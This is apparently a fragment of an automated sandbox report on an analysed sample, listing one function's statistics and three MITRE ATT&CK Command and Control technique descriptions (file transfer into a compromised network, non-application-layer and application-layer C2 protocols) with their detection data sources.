Code Manipulations

Statistics

Function 011E415D, Relevance: .2, Instructions: 238
COMMONCrypto

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre